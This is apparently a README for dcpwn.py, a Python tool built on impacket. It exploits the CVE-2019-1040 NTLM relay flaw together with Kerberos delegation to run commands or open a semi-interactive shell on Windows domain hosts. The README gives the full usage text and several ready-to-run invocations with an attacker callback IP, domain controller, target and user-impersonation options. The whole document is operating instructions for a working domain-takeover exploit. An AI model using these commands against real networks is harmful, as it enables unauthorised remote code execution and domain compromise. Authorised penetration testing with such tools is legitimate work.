Home

Awesome

CVE-2019-1040-dcpwn

Great writeup! Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin .

So, I wrote dcpwn.py for easy to use.

Requirements

These tools require impacket. You can install it from pip

pip install impacket

Usage

usage: dcpwn.py [-h] [-u USERNAME] [-p PASSWORD] [--hashes HASHES] -d DOMAIN
                [--smb-port [destination port]] --callback-ip CALLBACK_IP
                --ldaps LDAPS --dc-ip DC_IP [--timeout TIMEOUT]
                [--impersonate IMPERSONATE] -t Target [-share SHARE]
                [--command [COMMAND [COMMAND ...]]] [--debug]

CVE-2019-1040 with Kerberos delegation

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --user USERNAME
                        username for authentication
  -p PASSWORD, --password PASSWORD
                        Password for authentication, will prompt if not
                        specified and no NT:NTLM hashes are supplied
  --hashes HASHES       LM:NLTM hashes
  -d DOMAIN, --domain DOMAIN
                        domain the user is in (FQDN or NETBIOS domain name)
  --smb-port [destination port]
                        Destination port to connect to SMB Server
  --callback-ip CALLBACK_IP
                        Attacker hostname or IP
  --ldaps LDAPS         Hostname or ldaps server
  --dc-ip DC_IP         Domain controller ip address
  --timeout TIMEOUT     timeout in seconds
  --impersonate IMPERSONATE
                        target username that will be impersonated (thru
                        S4U2Self) for quering the ST. Keep in mind this will
                        only work if the identity provided in this scripts is
                        allowed for delegation to the SPN specified
  -t Target, --target Target
                        Hostname/IP of the target server
  -share SHARE          share where the output will be grabbed from (default
                        ADMIN$)
  --command [COMMAND [COMMAND ...]]
                        command to execute at the target. If empty it will
                        launch a semi-interactive shell
  --debug               Enable debug output

example:

sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target

If you want to execute some command like cmd.exe. use --command

example:

sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --command 'cmd.exe'

If you want to impersonate specified user, use --impersonate

sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --impersonate someone